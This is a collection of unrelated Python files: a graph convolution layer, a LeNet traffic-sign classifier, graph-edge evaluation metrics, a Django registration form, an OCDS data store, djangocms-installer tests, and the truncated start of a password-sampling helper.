        self.linears = nn.ModuleList([nn.Linear(in_dim, out_dim, bias=False) for _ in range(order + 1)])
        self.bias = Parameter(torch.Tensor(out_dim))
        self._init_bias()
        self.batchnorm_h = nn.BatchNorm1d(out_dim)
        self.activation = activation
        self.dropout = nn.Dropout(dropout)
    def _init_bias(self):
        # Uniform init bounded by 1/sqrt(fan_in), matching nn.Linear's default
        # bias initialization.
        bound = 1 / math.sqrt(self.in_channels)
        init.uniform_(self.bias, -bound, bound)
    def _agg_readout_sum(self, outs):
        # Sum the per-order outputs element-wise.
        h = torch.stack(outs, dim=0).sum(dim=0)
        return h
    def forward(self, g, node_feat, intermediate=None):
        # `intermediate`, if given, is a callback invoked with named
        # intermediate tensors for inspection/debugging.
        h_in = node_feat
        if intermediate is not None:
            intermediate(h_in, 'input')
        g = g.local_var()
        g.ndata['h'] = h_in
        # Precompute sqrt-degree normalizers consumed by sym_normalized_msg.
        g.ndata['in_deg'] = torch.sqrt(g.in_degrees().float()).unsqueeze(-1).to(h_in.device)  # Expand to N x 1
        g.ndata['out_deg'] = torch.sqrt(g.out_degrees().float()).unsqueeze(-1).to(h_in.device)  # Expand to N x 1
        outs = []
        # Iteration i applies W_i to A^i X: 'h' holds A^i X because the
        # update_all at the end of each pass propagates one more hop.
        for i in range(0, len(self.linears)):
            h_o = self.linears[i](g.ndata['h'])
            outs.append(h_o)
            g.update_all(sym_normalized_msg, sym_normalized_reduce)
        h = self._agg_readout_sum(outs)
        h += self.bias
        if intermediate is not None:
            intermediate(h, 'linear_filter')
        if self.batch_norm:
            h = self.batchnorm_h(h)  # batch normalization
            if intermediate is not None:
                intermediate(h, 'batch_norm')
        if self.activation:
            h = self.activation(h)  # non-linear activation
            if intermediate is not None:
                intermediate(h, 'activation')
        if self.residual:
            h = h_in + h  # residual connection
            if intermediate is not None:
                intermediate(h, 'residual_conn')
        h = self.dropout(h)
        return h
    def __repr__(self):
        return '{}(in_channels={}, out_channels={}, residual={}, max_order={}, activation={})'.format(
            self.__class__.__name__,
            self.in_channels, self.out_channels, self.residual,
            self.max_order, self.activation)
|
import pandas as pd
import numpy as np
import tensorflow as tf
import random
import matplotlib.pyplot as plt
from sklearn.utils import shuffle
from tensorflow.contrib.layers import flatten
import csv
import cv2
from resizeimage import resizeimage
from PIL import Image
###### STEP 0: Load the Data ##############################################
# Load pickled data
import pickle
# TODO: Fill this in based on where you saved the training and testing data
training_file = "../traffic-signs-data/train.p"
# NOTE(review): validation_file and testing_file also point at train.p, so all
# three splits load the same data — presumably these should be valid.p and
# test.p; confirm against the dataset layout.
validation_file = "../traffic-signs-data/train.p"
testing_file = "../traffic-signs-data/train.p"
with open(training_file, mode='rb') as f:
    train = pickle.load(f)
with open(validation_file, mode='rb') as f:
    valid = pickle.load(f)
with open(testing_file, mode='rb') as f:
    test = pickle.load(f)
X_train, y_train = train['features'], train['labels']
X_valid, y_valid = valid['features'], valid['labels']
# Fix: the test split was loaded but never unpacked, so the later call
# evaluate(X_test, y_test) raised NameError.
X_test, y_test = test['features'], test['labels']
img = cv2.imread('../online-signs-data/sign1.jpg')
image = cv2.resize(img, (32, 32))
image_shape = image.shape
print(image_shape)
###### STEP 1: Dataset Summary & Exploration ##############################
### Replace each question mark with the appropriate value.
# Fix: this comment block was garbled — one fragment was left uncommented
# ("with the appropriate value.") which was a SyntaxError.
# image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
### Use python, pandas or numpy methods rather than hard coding the results
# TODO: Number of training examples
n_train = len(X_train)
# TODO: Number of validation examples
n_validation = len(X_valid)
# TODO: Number of testing examples.
# n_test = len(X_test)
# for image in X_train:
# for image in X_valid:
#     image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# for image in X_test:
#     image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# TODO: What's the shape of an traffic sign image?
image_shape = X_train[0].shape
# TODO: How many unique classes/labels there are in the dataset.
# Parse class ids from the first CSV column, skipping the header row (whose
# first field is not numeric).
f = open('../signnames.csv')
lines = f.readlines()
classes = []
for line in lines:
    num_strs = line.split(',')
    try:
        label = float(num_strs[0])
    except ValueError:
        pass
    else:
        classes.append(label)
n_classes = len(classes)
print("Number of training examples =", n_train)
# print("Number of testing examples =", n_test)
print("Image data shape =", image_shape)
print("Number of classes =", n_classes)
index = random.randint(0, n_train)
image = X_train[index].squeeze()
plt.figure(figsize=(1, 1))
# Fix: this plotted X_test (undefined at this point → NameError); the intent —
# matching the print of y_train[index] below — is to show the sampled image.
plt.imshow(image, cmap="gray")
plt.savefig('../visual.jpg')
print(y_train[index])
######## STEP 2: Design and Test a Model Architecture ####################
# Shuffle once up front so mini-batches are not ordered by class.
X_train, y_train = shuffle(X_train, y_train)
EPOCHS = 10        # passes over the training set
BATCH_SIZE = 128   # mini-batch size
def LeNet(x):
    """LeNet-5 style classifier: 32x32x3 images -> n_classes logits."""
    # Hyperparameters for the truncated-normal weight initialization.
    mu = 0
    sigma = 0.1
    # Layer 1: conv 5x5, 3 -> 6 maps (28x28x6), ReLU, 2x2 max-pool -> 14x14x6.
    w1 = tf.Variable(tf.truncated_normal(shape=(5, 5, 3, 6), mean=mu, stddev=sigma))
    b1 = tf.Variable(tf.zeros(6))
    net = tf.nn.conv2d(x, w1, strides=[1, 1, 1, 1], padding='VALID') + b1
    net = tf.nn.relu(net)
    net = tf.nn.max_pool(net, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')
    # Layer 2: conv 5x5, 6 -> 16 maps (10x10x16), ReLU, 2x2 max-pool -> 5x5x16.
    w2 = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16), mean=mu, stddev=sigma))
    b2 = tf.Variable(tf.zeros(16))
    net = tf.nn.conv2d(net, w2, strides=[1, 1, 1, 1], padding='VALID') + b2
    net = tf.nn.relu(net)
    net = tf.nn.max_pool(net, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')
    # Flatten 5x5x16 -> 400.
    net = flatten(net)
    # Layer 3: fully connected 400 -> 120, ReLU.
    w3 = tf.Variable(tf.truncated_normal(shape=(400, 120), mean=mu, stddev=sigma))
    b3 = tf.Variable(tf.zeros(120))
    net = tf.nn.relu(tf.matmul(net, w3) + b3)
    # Layer 4: fully connected 120 -> 84, ReLU.
    w4 = tf.Variable(tf.truncated_normal(shape=(120, 84), mean=mu, stddev=sigma))
    b4 = tf.Variable(tf.zeros(84))
    net = tf.nn.relu(tf.matmul(net, w4) + b4)
    # Layer 5: fully connected 84 -> n_classes raw logits (no activation).
    w5 = tf.Variable(tf.truncated_normal(shape=(84, n_classes), mean=mu, stddev=sigma))
    b5 = tf.Variable(tf.zeros(n_classes))
    return tf.matmul(net, w5) + b5
# Placeholders: input image batch and integer class labels.
x = tf.placeholder(tf.float32, (None, 32, 32, 3))
y = tf.placeholder(tf.int32, (None))
one_hot_y = tf.one_hot(y, n_classes)
# Training pipeline
rate = 0.001  # Adam learning rate
logits = LeNet(x)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits)
loss_operation = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate = rate)
training_operation = optimizer.minimize(loss_operation)
#############################################################################################
# Model Evaluation: fraction of batch items whose argmax matches the label.
correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))
accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
saver = tf.train.Saver()
def evaluate(X_data, y_data):
    """Run the accuracy op over X_data/y_data in batches; return mean accuracy."""
    sess = tf.get_default_session()
    n = len(X_data)
    weighted_sum = 0
    for start in range(0, n, BATCH_SIZE):
        xb = X_data[start:start + BATCH_SIZE]
        yb = y_data[start:start + BATCH_SIZE]
        acc = sess.run(accuracy_operation, feed_dict={x: xb, y: yb})
        # Weight each batch by its size so a short final batch doesn't skew
        # the average.
        weighted_sum += acc * len(xb)
    return weighted_sum / n
# X_test = cv2.imread('../online-signs-data/sign1.jpg')
# Y_test = np.array([29])
with tf.Session() as sess:
    # Restore the most recent checkpoint from the working directory.
    saver.restore(sess, tf.train.latest_checkpoint('.'))
    # NOTE(review): X_test / y_test must be unpacked from `test` earlier
    # (test['features'], test['labels']) or this raises NameError — confirm.
    test_accuracy = evaluate(X_test, y_test)
    # Fix: removed a stray trailing "|" character that made this line a
    # SyntaxError.
    print("Test Accuracy = {:.3f}".format(test_accuracy))
import numpy as np
import scipy
import sklearn.metrics
def precision_at_n(adj_test, adj_true, n):
    """Precision@n: fraction of the n highest-scoring entries that are true edges."""
    assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), "Expect 1-dimensional arrays"
    top_idx = np.argsort(adj_test)[::-1][:n]
    hits = np.count_nonzero(adj_true[top_idx] > 0)
    return hits / n
def true_positive(adj_test, adj_true, threshold=0.05):
    """Count entries predicted positive (score > threshold) that are truly positive."""
    assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), \
        "Parameters should be one-dimensional"
    return np.sum((adj_test > threshold) & (adj_true > 0))

def false_positive(adj_test, adj_true, threshold=0.05):
    """Count entries predicted positive whose ground truth is zero."""
    assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), \
        "Parameters should be one-dimensional"
    return np.sum((adj_test > threshold) & (adj_true == 0))

def false_negative(adj_test, adj_true, threshold=0.05):
    """Count entries predicted negative (score <= threshold) that are truly positive."""
    assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), \
        "Parameters should be one-dimensional"
    return np.sum((adj_test <= threshold) & (adj_true > 0))

def true_negative(adj_test, adj_true, threshold=0.05):
    """Count entries predicted negative whose ground truth is zero."""
    assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), \
        "Parameters should be one-dimensional"
    return np.sum((adj_test <= threshold) & (adj_true == 0))
def tp(adj_test, adj_true, threshold=0.05):
    """Shorthand for :func:`true_positive`."""
    return true_positive(adj_test, adj_true, threshold=threshold)

def fp(adj_test, adj_true, threshold=0.05):
    """Shorthand for :func:`false_positive`."""
    return false_positive(adj_test, adj_true, threshold=threshold)

def tn(adj_test, adj_true, threshold=0.05):
    """Shorthand for :func:`true_negative`."""
    return true_negative(adj_test, adj_true, threshold=threshold)

def fn(adj_test, adj_true, threshold=0.05):
    """Shorthand for :func:`false_negative`."""
    return false_negative(adj_test, adj_true, threshold=threshold)
def recall(adj_test, adj_true, threshold=0.05):
    """TP / #ground-truth positives; returns 0 when TP == 0 (avoids 0/0)."""
    tp_val = tp(adj_test, adj_true, threshold)
    if tp_val == 0:
        return tp_val
    return tp_val / np.sum(adj_true > 0)

def precision(adj_test, adj_true, threshold=0.05):
    """TP / #predicted positives; returns 0 when TP == 0 (avoids 0/0)."""
    tp_val = tp(adj_test, adj_true, threshold)
    if tp_val == 0:
        return tp_val
    return tp_val / np.sum(adj_test > threshold)
def tpr(adj_test, adj_true, threshold=0.05):
    """True-positive rate (synonym for recall)."""
    return recall(adj_test, adj_true, threshold)

def fpr(adj_test, adj_true, threshold=0.05):
    """False-positive rate: FP / #ground-truth negatives (0 when FP == 0)."""
    fp_val = fp(adj_test, adj_true, threshold)
    if fp_val == 0:
        return fp_val
    return fp_val / np.sum(adj_true == 0)

def tnr(adj_test, adj_true, threshold=0.05):
    """True-negative rate: TN / #ground-truth negatives (0 when TN == 0)."""
    tn_val = tn(adj_test, adj_true, threshold)
    if tn_val == 0:
        return tn_val
    return tn_val / np.sum(adj_true == 0)

def fnr(adj_test, adj_true, threshold=0.05):
    """False-negative rate: FN / #ground-truth positives (0 when FN == 0)."""
    fn_val = fn(adj_test, adj_true, threshold)
    if fn_val == 0:
        return fn_val
    return fn_val / np.sum(adj_true > 0)
def fscore(adj_test, adj_true, threshold=0.05, beta=1.0):
    """F-beta score combining precision and recall at the given threshold."""
    rec = recall(adj_test, adj_true, threshold)
    prec = precision(adj_test, adj_true, threshold)
    # Guard the degenerate 0/0 case.
    if rec == 0 and prec == 0:
        return 0.0
    b2 = beta ** 2
    return (1 + b2) * prec * rec / (b2 * prec + rec)
# NOTE(review): tpr/fpr are defined twice in this module; these later
# definitions silently shadow the earlier ones — consider deleting one pair.
def tpr(adj_test, adj_true, threshold=0.05):
    """True-positive rate (synonym for recall)."""
    return recall(adj_test, adj_true, threshold)

def fpr(adj_test, adj_true, threshold=0.05):
    """False-positive rate: FP / #ground-truth negatives.

    Fix: guarded like the earlier fpr definition so FP == 0 no longer risks a
    0/0 division (numpy nan + RuntimeWarning) when there are no negatives.
    """
    fp_val = fp(adj_test, adj_true, threshold)
    if fp_val == 0:
        return fp_val
    return fp_val / np.sum(adj_true == 0)
def nrmse(adj_test, adj_true):
    """Root-sum-squared error normalized by the sum of squared true values.

    NOTE(review): conventional NRMSE divides by the root of the true energy;
    this divides by the (un-rooted) sum — confirm the intended definition.
    """
    err = adj_test - adj_true
    return np.sqrt(np.sum(err ** 2)) / np.sum(adj_true ** 2)
def relerr(adj_test, adj_true, norm=True, null_norm='min'):
    """Mean per-node relative error between estimated and true adjacency values.

    Entries with a positive true value are normalized by that value. Entries
    whose true value is zero are handled per `null_norm`: 'min' divides their
    absolute error by the smallest nonzero true value, 'none' leaves them
    unnormalized, 'ignore' drops them, and a float divides by that constant.
    Any numeric failure (e.g. an empty mask making .min() raise) yields nan.
    """
    mask = adj_true > 0
    n_nodes = adj_true.shape[0]
    try:
        if norm:
            if null_norm == 'min':
                # Zero-truth errors normalized by the smallest nonzero truth.
                rel_err = np.sum(np.abs(adj_test - adj_true)[mask] / adj_true[mask]) + np.abs(adj_test - adj_true)[~mask].sum() / adj_true[mask].min()
            elif null_norm == 'none':
                rel_err = np.sum(np.abs(adj_test - adj_true)[mask] / adj_true[mask]) + np.abs(adj_test - adj_true)[~mask].sum()
            elif null_norm == 'ignore':
                rel_err = np.sum(np.abs(adj_test - adj_true)[mask] / adj_true[mask])
            elif isinstance(null_norm, float):
                rel_err = np.sum(np.abs(adj_test - adj_true)[mask] / adj_true[mask]) + np.abs(adj_test - adj_true)[~mask].sum() / null_norm
            else:
                raise ValueError('Invalid norm')
        else:
            rel_err = np.sum(np.abs(adj_test - adj_true))
    except Exception:
        # Deliberate best-effort: any failure is reported as nan rather than
        # aborting a larger evaluation run.
        rel_err = np.nan
    return rel_err / n_nodes
def pr_auc_score(adj_test, adj_true):
    """Average precision (area under the precision-recall curve)."""
    y_true = np.ravel(adj_true) > 0
    y_score = np.ravel(adj_test)
    return sklearn.metrics.average_precision_score(y_true, y_score)
|
<filename>bosm2015/registration/forms.py<gh_stars>1-10
from registration.models import UserProfile
from django.contrib.auth.models import User
from nocaptcha_recaptcha.fields import NoReCaptchaField
from django import forms
# Choices for the registration "city" dropdown, as (value, label) pairs.
# Fix: removed a duplicate ('Bahadurgarh', 'Bahadurgarh') entry that appeared
# twice in the list.
cities = (
    ('Alwar', 'Alwar'),
    ('Bahadurgarh', 'Bahadurgarh'),
    ('Bangalore', 'Bangalore'),
    ('Bareilly', 'Bareilly'),
    ('Bellary', 'Bellary'),
    ('Berhampur', 'Berhampur'),
    ('Bhilai', 'Bhilai'),
    ('Bhiwani', 'Bhiwani'),
    ('Bhopal', 'Bhopal'),
    ('Bhubaneswar', 'Bhubaneswar'),
    ('Bikaner', 'Bikaner'),
    ('Bilaspur', 'Bilaspur'),
    ('Chandigarh', 'Chandigarh'),
    ('Chennai', 'Chennai'),
    ('Chirawa', 'Chirawa'),
    ('Chitoor', 'Chitoor'),
    ('Chittorgarh', 'Chittorgarh'),
    ('Cochin', 'Cochin'),
    ('Coimbatore', 'Coimbatore'),
    ('Dehradun', 'Dehradun'),
    ('Deogarh', 'Deogarh'),
    ('Dindigul', 'Dindigul'),
    ('Faridabad', 'Faridabad'),
    ('Faridkot', 'Faridkot'),
    ('Gandhinagar', 'Gandhinagar'),
    ('Ghaziabad', 'Ghaziabad'),
    ('Goa', 'Goa'),
    ('Guna', 'Guna'),
    ('Guntur', 'Guntur'),
    ('Gurgaon', 'Gurgaon'),
    ('Gwalior', 'Gwalior'),
    ('Hamirpur', 'Hamirpur'),
    ('Hissar', 'Hissar'),
    ('Hyderabad', 'Hyderabad'),
    ('Indore', 'Indore'),
    ('Jaipur', 'Jaipur'),
    ('Jammu', 'Jammu'),
    ('Jhajjar', 'Jhajjar'),
    ('Jhalawar', 'Jhalawar'),
    ('Jhansi', 'Jhansi'),
    ('Jhunjhunu', 'Jhunjhunu'),
    ('Jodhpur', 'Jodhpur'),
    ('Kannur', 'Kannur'),
    ('Kanpur', 'Kanpur'),
    ('Kharagpur', 'Kharagpur'),
    ('Kolkata', 'Kolkata'),
    ('Kota', 'Kota'),
    ('Kurukshetra', 'Kurukshetra'),
    ('Lakshmangarh', 'Lakshmangarh'),
    ('Latur', 'Latur'),
    ('Lucknow', 'Lucknow'),
    ('Madurai', 'Madurai'),
    ('Mandi', 'Mandi'),
    ('Mathura', 'Mathura'),
    ('Meerut', 'Meerut'),
    ('Mohali', 'Mohali'),
    ('Moradabad', 'Moradabad'),
    ('Mumbai', 'Mumbai'),
    ('Nagpur', 'Nagpur'),
    ('Narasaraopet', 'Narasaraopet'),
    ('Nashik', 'Nashik'),
    ('Neemrana', 'Neemrana'),
    ('Nellore', 'Nellore'),
    ('New Delhi', 'New Delhi'),
    ('Noida', 'Noida'),
    ('Panipat', 'Panipat'),
    ('Patiala', 'Patiala'),
    ('Patna', 'Patna'),
    ('Pilani', 'Pilani'),
    ('Pondicherry', 'Pondicherry'),
    ('Pune', 'Pune'),
    ('Rohtak', 'Rohtak'),
    ('Roorkee', 'Roorkee'),
    ('Rupnagar', 'Rupnagar'),
    ('Sadopur', 'Sadopur'),
    ('Saharanpur', 'Saharanpur'),
    ('Salem', 'Salem'),
    ('Sambalpur', 'Sambalpur'),
    ('Sangur', 'Sangur'),
    ('Sarang', 'Sarang'),
    ('Shimla', 'Shimla'),
    ('Sikar', 'Sikar'),
    ('Sonepat', 'Sonepat'),
    ('Srikakulam', 'Srikakulam'),
    ('Srinagar', 'Srinagar'),
    ('Surathkal', 'Surathkal'),
    ('Tiruchengode', 'Tiruchengode'),
    ('Thiruvananthapuram', 'Thiruvananthapuram'),
    ('Udaipur', 'Udaipur'),
    ('Ujjain', 'Ujjain'),
    ('Vadodara', 'Vadodara'),
    ('Varanasi', 'Varanasi'),
    ('Vellore', 'Vellore'),
    ('Vijayawada', 'Vijayawada'),
    ('Vilani', 'Vilani'),
    ('Villupuram', 'Villupuram'),
    ('Vishakapatnam', 'Vishakapatnam'),
    ('Vizag', 'Vizag'),
    ('Warangal', 'Warangal'),
    ('Other', 'Other'),
)
class UserForm(forms.ModelForm):
    """Registration form exposing username/email/password from the User model."""

    class Meta:
        model = User
        fields = ('username', 'email', 'password')
        # Mask the password input in the rendered form.
        widgets = {'password': forms.PasswordInput()}
class UserProfileForm(forms.ModelForm):
    """Extra registration details (name, college, city, phone) plus a captcha."""
    # Fix: `error_message` is not a valid form-field kwarg in modern Django
    # (removed after its 1.0-era deprecation); use the `error_messages` dict.
    phone = forms.RegexField(
        regex=r'^\d{10}$',
        error_messages={'invalid': "Enter a valid 10 digit mobile number!"},
    )
    captcha = NoReCaptchaField()

    class Meta:
        model = UserProfile
        fields = ('firstname', 'lastname', 'college', 'city', 'phone')
        widgets = {
            'city': forms.Select(choices=cities),
        }
import json
from ocdskingfisher.database import DatabaseStore
class Store:
    """Loads OCDS files and file items into a collection in the database."""

    def __init__(self, config, database):
        self.config = config
        self.collection_id = None
        self.database = database
        # Fix: this flag was read in store_file_item() but never initialized,
        # so a release_package_json_lines item without a 'releases' key raised
        # AttributeError instead of the intended, configurable behavior.
        # Default False preserves the strict (raising) behavior.
        self.ignore_release_package_json_lines_missing_releases_error = False

    def load_collection(self, collection_source, collection_data_version, collection_sample):
        """Resolve (or create) the collection id this store writes into."""
        self.collection_id = self.database.get_or_create_collection_id(collection_source, collection_data_version, collection_sample)

    def store_file_from_local(self, filename, url, data_type, encoding, local_filename):
        """Store an entire local file; *_json_lines types are read line by line."""
        if data_type == 'release_package_json_lines' or data_type == 'record_package_json_lines':
            try:
                with open(local_filename, encoding=encoding) as f:
                    number = 0
                    raw_data = f.readline()
                    while raw_data:
                        self.store_file_item(filename, url, data_type, json.loads(raw_data), number)
                        raw_data = f.readline()
                        number += 1
            except Exception as e:
                raise e
                # TODO Store error in database and make nice HTTP response!
        else:
            try:
                with open(local_filename, encoding=encoding) as f:
                    data = json.load(f)
            except Exception as e:
                raise e
                # TODO Store error in database and make nice HTTP response!
            # Unwrap list-style payloads into individual package objects.
            objects_list = []
            if data_type == 'record_package_list_in_results':
                objects_list.extend(data['results'])
            elif data_type == 'release_package_list_in_results':
                objects_list.extend(data['results'])
            elif data_type == 'record_package_list' or data_type == 'release_package_list':
                objects_list.extend(data)
            else:
                objects_list.append(data)
            number = 0
            for item_data in objects_list:
                try:
                    self.store_file_item(filename, url, data_type, item_data, number)
                    number += 1
                except Exception as e:
                    raise e
                    # TODO Store error in database and make nice HTTP response!
        self.database.mark_collection_file_store_done(self.collection_id, filename)

    def store_file_item_from_local(self, filename, url, data_type, encoding, number, local_filename):
        """Load a single JSON item from a local file and store it."""
        try:
            with open(local_filename, encoding=encoding) as f:
                data = json.load(f)
        except Exception as e:
            raise e
            # TODO Store error in database and make nice HTTP response!
        try:
            self.store_file_item(filename, url, data_type, data, number)
        except Exception as e:
            raise e
            # TODO Store error in database and make nice HTTP response!

    def store_file_item(self, filename, url, data_type, json_data, number):
        """Store one JSON object's releases/records into the database.

        Raises Exception when the payload shape does not match data_type.
        """
        if not isinstance(json_data, dict):
            raise Exception("Can not process data as JSON is not an object")
        with DatabaseStore(database=self.database, collection_id=self.collection_id, file_name=filename, number=number) as store:
            if data_type == 'release' or data_type == 'record':
                data_list = [json_data]
            elif data_type == 'release_package' or \
                    data_type == 'release_package_json_lines' or \
                    data_type == 'release_package_list_in_results' or \
                    data_type == 'release_package_list':
                if 'releases' not in json_data:
                    if data_type == 'release_package_json_lines' and \
                            self.ignore_release_package_json_lines_missing_releases_error:
                        return
                    raise Exception("Release list not found")
                elif not isinstance(json_data['releases'], list):
                    raise Exception("Release list which is not a list found")
                data_list = json_data['releases']
            elif data_type == 'record_package' or \
                    data_type == 'record_package_json_lines' or \
                    data_type == 'record_package_list_in_results' or \
                    data_type == 'record_package_list':
                if 'records' not in json_data:
                    raise Exception("Record list not found")
                elif not isinstance(json_data['records'], list):
                    raise Exception("Record list which is not a list found")
                data_list = json_data['records']
            else:
                raise Exception("data_type not a known type")
            # Everything except the releases/records arrays is package metadata.
            package_data = {}
            if not data_type == 'release':
                for key, value in json_data.items():
                    if key not in ('releases', 'records'):
                        package_data[key] = value
            for row in data_list:
                if not isinstance(row, dict):
                    raise Exception("Row in data is not a object")
                if data_type == 'record' or \
                        data_type == 'record_package' or \
                        data_type == 'record_package_json_lines' or \
                        data_type == 'record_package_list_in_results' or \
                        data_type == 'record_package_list':
                    store.insert_record(row, package_data)
                else:
                    store.insert_release(row, package_data)
|
<filename>env/lib/python2.7/site-packages/tests/main.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
from subprocess import CalledProcessError
from mock import patch
from djangocms_installer import config, install, main
from .base import IsolatedTestClass, dj_ver, unittest
class TestMain(IsolatedTestClass):
    """End-to-end tests for djangocms_installer's `main.execute()` CLI.

    Each test builds sys.argv by hand, patches stdout/stderr onto the
    StringIO buffers provided by IsolatedTestClass, and inspects captured
    output or the created project directory.
    """

    def test_requirements_invocation(self):
        """-R flag: only print the requirements; check expected packages appear."""
        with patch('sys.stdout', self.stdout):
            with patch('sys.stderr', self.stderr):
                sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
                                       '-len', '--cms-version=stable', '-R',
                                       '-q', '-u', '-p'+self.project_dir,
                                       'example_prj']
                main.execute()
                stdout = self.stdout.getvalue()
                self.assertTrue(stdout.find('Django<1.8') > -1)
                self.assertTrue(stdout.find('django-reversion>=1.8') > -1)
                self.assertTrue(stdout.find('djangocms-text-ckeditor') > -1)
                self.assertTrue(stdout.find('djangocms-admin-style') > -1)
                self.assertTrue(stdout.find('djangocms-column') > -1)
                self.assertTrue(stdout.find('djangocms-file') > -1)
                self.assertTrue(stdout.find('djangocms-flash') > -1)
                self.assertTrue(stdout.find('djangocms-googlemap') > -1)
                self.assertTrue(stdout.find('djangocms-inherit') > -1)
                self.assertTrue(stdout.find('djangocms-link') > -1)
                self.assertTrue(stdout.find('djangocms-picture') > -1)
                self.assertTrue(stdout.find('djangocms-style') > -1)
                self.assertTrue(stdout.find('djangocms-teaser') > -1)
                self.assertTrue(stdout.find('djangocms-video') > -1)

    # NOTE(review): name lacks the `test_` prefix so the runner never collects
    # it — confirm whether that is intentional (it reads like a helper).
    def cleanup_ask(self):
        """cleanup_directory() should remove the generated project directory."""
        with patch('sys.stdout', self.stdout):
            with patch('sys.stderr', self.stderr):
                conf_data = config.parse([
                    '-q',
                    '--db=postgres://user:pwd@host/dbname',
                    '--i18n=no',
                    '--cms-version=2.4',
                    '--django-version=1.7',
                    '-f',
                    '-p'+self.project_dir,
                    'example_prj'])
                install.cleanup_directory(conf_data)
                self.assertFalse(os.path.exists(self.project_dir))

    def test_main_invocation(self):
        """Full run: project skeleton, requirements.txt and success message."""
        with patch('sys.stdout', self.stdout):
            with patch('sys.stderr', self.stderr):
                sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
                                       '-len', '--cms-version=stable', '--django=%s' % dj_ver,
                                       '-q', '-u', '-p'+self.project_dir,
                                       'example_prj']
                main.execute()
                self.assertTrue(os.path.exists(os.path.join(self.project_dir, 'static')))
                self.assertTrue(os.path.exists(os.path.join(self.project_dir, 'requirements.txt')))
                self.assertTrue(os.path.exists(os.path.join(self.project_dir, 'example_prj', 'static')))
                with open(os.path.join(self.project_dir, 'requirements.txt'), 'r') as req_file:
                    text = req_file.read()
                    self.assertTrue(text.find('djangocms-text-ckeditor') > -1)
                # Checking we successfully completed the whole process
                self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())

    def test_two_langs_invocation(self):
        """Full run with two -l language flags (en, fr)."""
        with patch('sys.stdout', self.stdout):
            with patch('sys.stderr', self.stderr):
                sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
                                       '-len', '-lfr', '--cms-version=stable', '--django=%s' % dj_ver,
                                       '-q', '-u', '-p'+self.project_dir,
                                       'example_prj']
                main.execute()
                # Checking we successfully completed the whole process
                self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())

    def test_develop(self):
        """Full run against the development version of django CMS."""
        with patch('sys.stdout', self.stdout):
            with patch('sys.stderr', self.stderr):
                sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
                                       '-len', '--cms-version=develop', '--django=%s' % dj_ver,
                                       '-q', '-u', '-p'+self.project_dir,
                                       'example_prj']
                main.execute()
                # Checking we successfully completed the whole process
                self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())

    def test_cleanup(self):
        """A failed install (unreachable postgres, no driver) removes the dir."""
        with patch('sys.stdout', self.stdout):
            with patch('sys.stderr', self.stderr):
                with self.assertRaises((CalledProcessError, EnvironmentError)):
                    sys.argv = ['main'] + ['--db=postgres://user:pwd@host/dbname',
                                           '-len', '--no-db-driver',
                                           '-q', '-u', '-p'+self.project_dir,
                                           'example_prj']
                    main.execute()
                self.assertFalse(os.path.exists(self.project_dir))

    @unittest.skipIf(sys.version_info >= (3, 0),
                     reason='django 1.4 does not support python3')
    def test_django_1_4(self):
        """Full run pinned to Django 1.4 / CMS 3.0 (python2 only)."""
        with patch('sys.stdout', self.stdout):
            with patch('sys.stderr', self.stderr):
                sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
                                       '-len', '--django-version=1.4',
                                       '--cms-version=3.0',
                                       '-q', '-u', '-p'+self.project_dir,
                                       'example_prj']
                main.execute()
                # Checking we successfully completed the whole process
                self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())

    @unittest.skipIf(sys.version_info >= (3, 0),
                     reason='django 1.5 does not support python3')
    def test_django_1_5(self):
        """Full run pinned to Django 1.5 / CMS 3.0 (python2 only)."""
        with patch('sys.stdout', self.stdout):
            with patch('sys.stderr', self.stderr):
                sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
                                       '-len', '--django-version=1.5',
                                       '--cms-version=3.0',
                                       '-q', '-u', '-p'+self.project_dir,
                                       'example_prj']
                main.execute()
                # Checking we successfully completed the whole process
                self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())
|
<gh_stars>0
# _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# <NAME>
# Contact: <EMAIL>
#
import logging
import os
import random
import string
from secrets import choice
from Cryptodome.Random.random import shuffle
PW_SPECIAL_CHARACTERS = '!@#$%()+;<>=?[]{}^.,'
def randomSample(sampleLength=0, sampleString=''):
    """Return `sampleLength` characters drawn at random from `sampleString`.

    Prefers the `secrets` CSPRNG; on interpreters without it, falls back to
    an os.urandom-based selection.
    """
    sample = ''
    use_secrets = False
    try:
        # Older version of Python (before 3.6) don't have this module.
        # If not installed, fall back to the original version of the code
        import secrets
        logging.debug("module 'secrets' is installed")
        use_secrets = True
    except ImportError:
        # Fix: catching ModuleNotFoundError would itself raise NameError on
        # the very interpreters (< 3.6) this fallback exists for; ImportError
        # is its base class and exists everywhere.
